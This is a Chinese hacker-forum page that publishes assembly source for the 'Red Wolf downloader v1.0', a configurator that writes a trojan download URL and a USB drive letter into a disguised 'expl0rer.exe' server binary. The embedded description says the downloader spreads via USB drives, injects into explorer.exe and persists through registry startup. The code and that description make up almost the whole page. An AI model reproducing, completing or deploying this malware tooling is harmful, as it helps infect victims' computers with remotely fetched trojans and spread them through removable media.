| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 编程技术 >> 黑客编程 >> 文章正文 用户登录 新用户注册

红狼下载者v1.0源代码    热      【字体：小 大】
红狼下载者v1.0源代码
作者：不详    文章来源：CnXHacker.Net    点击数：    更新时间：2007-4-25
;****************************************************** ;程序编写by Asm ;日期：2006-12-25日凌晨 ;出处：http://www.wolfexp.net/（红狼安全小组） ;注意事项：如欲转载，请保持本程序的完整，并注明： ;转载自 红狼安全小组(http://www.wolfexp.net/) ;****************************************************** .386 .model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include 文件定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> include   windows.inc include   user32.inc includelib   user32.lib include   kernel32.inc includelib   kernel32.lib include   shell32.inc includelib   shell32.lib ModifyFile PROTO :LPSTR ;函数声明 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Equ 等值定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ICO_MAIN   equ   1000h   ;图标 DLG_MAIN   equ   1 IDC_URL equ   1001 IDC_U   equ 1002 IDC_About equ 1003 IDC_Out   equ 1004 IDC_Wolf   equ 1005 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 数据段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .data? hInstance   dd   ? hWindow dd ? hFile dd ? hMap dd ? pMapAddr dd ? .data szUrl db 156 dup(0) szU   db 156 dup (0) FileName db 'expl0rer.exe',0 szText db '下载者配制成功！',0 szCaption db '恭喜',0 szCI db 'G:\',0 szMuma db 'http://www.wolfexp.exe/muma.exe',0 szSury db '你总该输入点什么东西吧 ^_^',0 szAbout db '这个下载者通过U盘传播，至于传播的U盘分区则是自己选择，H:\或者G:\，默认是H:\',0dh   db '注入explorer.exe进程，无dll，注册成注册表启动。可能在下个版本设置成系统服务的方式',0dh   db '如果你有什么好的建议，可以到红狼安全小组找我讨论',0dh   db '程序编写by Asm 红狼安全小组[C.R.S.T]',0dh,0ah,0 szTit db '关于工具的一点说明',0 szWolf db 'http://www.wolfexp.net/',0 szErorr db '没有找到原始服务端，无法进行配置！',0 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 代码段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>   .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _Process proc local @stFindFile:WIN32_FIND_DATA invoke FindFirstFile,addr FileName,addr @stFindFile ;查找是否有服务端 .if eax == INVALID_HANDLE_VALUE invoke MessageBox,NULL,addr szErorr,NULL,MB_OK .elseif invoke CreateFile,addr FileName,GENERIC_READ or GENERIC_WRITE,\ ;打开它 FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING, \         FILE_ATTRIBUTE_NORMAL,NULL             .if eax!=INVALID_HANDLE_VALUE mov hFile, eax ;保存句柄         invoke CreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,NULL ;建立内存共享 .if eax!=NULL mov hMap,eax ;保存句柄 invoke MapViewOfFile,hMap,FILE_MAP_WRITE,0,0,NULL ;读取内存共享 .if eax!=NULL mov pMapAddr,eax ;保存句柄 invoke ModifyFile,pMapAddr   ;修改服务端内存里内容 invoke UnmapViewOfFile,pMapAddr ;解除文件映射 .endif   invoke CloseHandle,hMap   ;关闭内存映射文件 .endif invoke CloseHandle,hFile     ;关闭文件 .endif .endif ret _Process endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ModifyFile proc uses ebx esi edi,lpBufferAddress:LPSTR mov edi,lpBufferAddress   ;得到内存地址 add edi,0010a0h       ;得到要写入的U盘分区的地址 invoke lstrcpy,edi,addr szU   ;修改edi地址处的内容为szU所保存的 xor edi,edi ;清空这个edi，免得物理内存地址重复 mov edi,lpBufferAddress ;重新得到内存地址 add edi,001a24h ;得到要写入的木马的地址 invoke lstrcpy,edi,addr szUrl ;修改edi地址处的内容为szUrl所保存的 invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK ;提示配置成功 ret ModifyFile endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _ProcDlgMain   proc   uses ebx edi esi hWnd,wMsg,wParam,lParam   mov   eax,wMsg   .if   eax == WM_CLOSE     invoke   EndDialog,hWnd,NULL   .elseif   eax == WM_INITDIALOG     invoke   LoadIcon,hInstance,ICO_MAIN     invoke   SendMessage,hWnd,WM_SETICON,ICON_BIG,eax     invoke SetDlgItemText,hWnd,IDC_URL,addr szMuma     invoke SetDlgItemText,hWnd,IDC_U,addr szCI   .elseif   eax == WM_COMMAND     mov   eax,wParam     .if   ax == IDOK       invoke   GetDlgItemText,hWnd,IDC_URL,addr szUrl,sizeof szUrl       invoke   GetDlgItemText,hWnd,IDC_U,addr szU,sizeof szU       invoke lstrlen,addr szUrl       .if ax == NULL       invoke MessageBox,NULL,addr szSury,NULL,MB_OK       .elseif       call _Process       .endif       .elseif ax == IDC_About       invoke MessageBox,NULL,addr szAbout,addr szTit,MB_OK       .elseif ax == IDC_Out       invoke ExitProcess,NULL       .elseif ax == IDC_Wolf       invoke ShellExecute,0,0,addr szWolf,0,0,SW_SHOW     .endif   .else     mov   eax,FALSE     ret   .endif   mov   eax,TRUE   ret _ProcDlgMain   endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> start:   invoke   GetModuleHandle,NULL   mov   hInstance,eax   invoke   DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL   invoke   ExitProcess,NULL ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>   end   start
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 如何在NP下读写游戏内存及如何进入NP进程 下一篇文章： 利用winsocket编程发送伪造COOKIE
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				带宽严重不足!美网络用户因过 火狐浏览器下载次数突破4亿大 警惕木马下载器将您的电脑变 Safari在处理Java Applet的下 巧用下载利器IDM 防止浏览器 本周病毒警惕：KL木马下载器 美国一黑客利用谷歌免费下载 牛X下载者生成器生成的网页木 Windows版本Safari 48小时内 利用下载漏洞对数据库发起网

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.